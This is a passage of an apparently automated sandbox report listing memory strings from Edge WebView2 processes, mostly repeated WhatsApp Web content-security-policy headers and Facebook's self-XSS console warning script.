https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3647474243.00001B4400130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: QAAABodHRwczovL3doYXRzYXBwLmNvbQ==",false]ta: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2568526081.00001B44005E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ["GAAAABQAAABodHRwczovL3doYXRzYXBwLmNvbQ==",false]ta: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2568526081.00001B44005E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ["GAAAABQAAABodHRwczovL3doYXRzYXBwLmNvbQ==",false]ta: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2621731822.00001B44004A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: __d("Chromedome",["fbt"],(function(a,b,c,d,e,f,g,h){function i(){if(document.domain==null)return null;var a=document.domain,b=/^intern\./.test(a);if(b)return null;b=/(^|\.)facebook\.(com|sg)$/.test(a);if(b)return"facebook";b=/(^|\.)instagram\.com$/.test(a);if(b)return"instagram";b=/(^|\.)threads\.net$/.test(a);if(b)return"threads";b=/(^|\.)messenger\.com$/.test(a);return b?"messenger":null}function j(a){if(a==="instagram")return h._("This is a browser feature intended for developers. If someone told you to copy-paste something here to enable an Instagram feature or \"hack\" someone's account, it is a scam and will give them access to your Instagram account.");return a==="threads"?h._("This is a browser feature intended for developers. If someone told you to copy-paste something here to enable a Threads feature or \"hack\" someone's account, it is a scam and will give them access to your Threads account."):h._("This is a browser feature intended for developers. If someone told you to copy-paste something here to enable a Facebook feature or \"hack\" someone's account, it is a scam and will give them access to your Facebook account.")}function a(a){if(top!==window)return;a=i();if(a==null)return;var b=h._("Stop!");a=j(a);var c=h._("See {url} for more information.",[h._param("url","https://www.facebook.com/selfxss")]);if(window.chrome||window.safari){var d="font-family:helvetica; font-size:20px; ";[[b,d+"font-size:50px; font-weight:bold; color:red; -webkit-text-stroke:1px black;"],[a,d],[c,d],["",""]].map(function(a){window.setTimeout(console.log.bind(console,"\n%c"+a[0].toString(),a[1]))})}else{b=[""," .d8888b. 888 888","d88P Y88b 888 888","Y88b. 888 888",' "Y888b. 888888 .d88b. 88888b. 888',' "Y88b. 888 d88""88b 888 "88b 888',' "888 888 888 888 888 888 Y8P',"Y88b d88P Y88b. Y88..88P 888 d88P",' "Y8888P" "Y888 "Y88P" 88888P" 888'," 888"," 888"," 888"];d=(""+a.toString()).match(/.{35}.+?\s+|.+$/g);if(d!=null){a=Math.floor(Math.max(0,(b.length-d.length)/2));for(var e=0;e<b.length||e<d.length;e++){var f=b[e];b[e]=f+new Array(45-f.length).join(" ")+(d[e-a]||"")}}console.log("\n\n\n"+b.join("\n")+"\n\n"+c.toString()+"\n");return}}g.start=a}),98); equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2398051328.00001B44005E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: _net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2570850324.00001B4400438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: _reporting/coep/?minimize=0C;https://www.facebook.com/browser_reporting/coop/?minimize=0UMhttps://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown@8https://www.whatsapp.com/whatsapp_browser_error_reports/ equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3647474243.00001B4400130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000002.3660602441.00001B4400424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ata: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000002.3658956575.00001B44003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ata: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 0000001D.00000002.3702312183.00002DDC009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ata: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com- equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658956575.00001B44003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ata: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.comD equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3662236273.00001B4400664000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ata: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com[ equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3647474243.00001B4400130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: b: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2598410666.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cestors 'self';default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2598410666.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cestors 'self';default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2398346870.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cestors 'self';default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;D equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2398346870.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cestors 'self';default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;D equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: coep_reporthttps://www.facebook.com/browser_reporting/coep/?minimize=0["GAAAABQAAABodHRwczovL3doYXRzYXBwLmNvbQ==",false] equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000026.00000003.2376075947.00004B18009EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: content-security-policy: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000026.00000003.2376075947.00004B18009EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: content-security-policy: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000026.00000003.2525156426.00004B180074C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/" equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000026.00000003.2393511115.00004B180074C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"< equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000026.00000003.2525156426.00004B180074C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"K equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: coop_reporthttps://www.facebook.com/browser_reporting/coop/?minimize=0["GAAAABQAAABodHRwczovL3doYXRzYXBwLmNvbQ==",false] equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 0000001D.00000002.3707687086.00002DDC00E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;- equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 0000001D.00000002.3707687086.00002DDC00E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;- equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2398346870.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;D equals www.facebook.com (Facebook)
